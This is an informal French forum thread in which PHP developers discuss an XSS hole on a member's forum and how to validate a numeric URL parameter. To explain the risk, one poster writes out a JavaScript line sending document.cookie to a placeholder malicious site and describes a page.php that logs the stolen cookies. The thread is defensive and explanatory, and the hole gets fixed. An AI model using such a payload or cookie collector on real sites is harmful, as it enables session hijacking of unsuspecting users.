Reprise du message précédent :

pourkoi t'as un point la?
preg_match("/[0-9]+/", $str) ca suffit non? si le gars met kke chose derriere le nombre, c kil teste des truc > tu l'envoie chier et le redirige sur l'accueil...
enfin c ce que je fais moi

il le poste ds ton forum et peux recuperer tout les cookie de tout le monde qui clique... meme toi tu peux pas faire a 100% attention a toutes les url.. (l'erreur est humaine ) donc mieux vaut prevenir que guerir

je vois pa comment il peu recup les cookies de tt le monde ...

http://www.cgisecurity.com/articles/xss-faq.shtml

ben oui mais tu recupere TON cookie, pas ceux des autres
 
 
et pr le pavé en anglais : g pas ke ca a lire là

 
javascript:machin.redirect("http://mechant-le-site.com/mapage.php?tescookies="+ document.cookie)
 
bref redirection js avec recuperation des cookies comme ca ( c le client qui va completer l'url)

on est d'accord, mais celui ki bidouille l'url, il est seul, donc sur le mechant site yaura que ses cookies ... c pas tous les clients ki bidouille l'url

mais vu que tu avais cette faille sur ton forum,j'aurais pu mettre le js dans l'url et des que tu clique,tu active le js qui lui envoie le cookie sur un site pirate.

Evidemment il faut que ca soit la victime qui clique apres...
enfin bon...

comment tu veux que j'aille dans le site pirate si c'est moi ki clique et que ca soit toi ki mette le JS dans l'url ..

on te parle d'un lien la... plus de l'url...
t'as clique sur le lien de forummp3... ce son bien tes cookies qui sont apparu... ben la meme chose sauf qu'a la place de les afficher, ca les envoie sur un site qui les recupere justement

tu fais un script js qui te redirige vers la page.php?valeur_du_cookie et avec $HTTP_SERVER_VARS['QUERY_STRING']; sur page.php tu recupere la valeur du cookie que tu stocke dans un fichier ou dans ta bdd.

hum ok g pigé

 
hourra!    
 

j'avais pas vu lien != url

réparé

$vraicat =  !preg_match("/([^0-9]+)/",$cat);
 
 
et basta ...

bon moi pour mon forum je fais intval($_GET['cat']) et zou

faudrait peut etre le faire avec les autres variables,non?    
 
http://shakalagoons.dyndns.org/sky [...] e=1&trash=

sauf que ca marche pas avec ta methode ...

et pkoi? si le mec rentre trouducul a la place de 1 ben ca le redirigera vers la page d'erreur de cat id

et si le mec rentre 12abc ?
perso ca marche pas sur moi

ah oui ben bien sur, si tu veux que ca remplace par 12 ok...
moi je l'envoie chier soit il rentre 12 soit il revient a l'accueil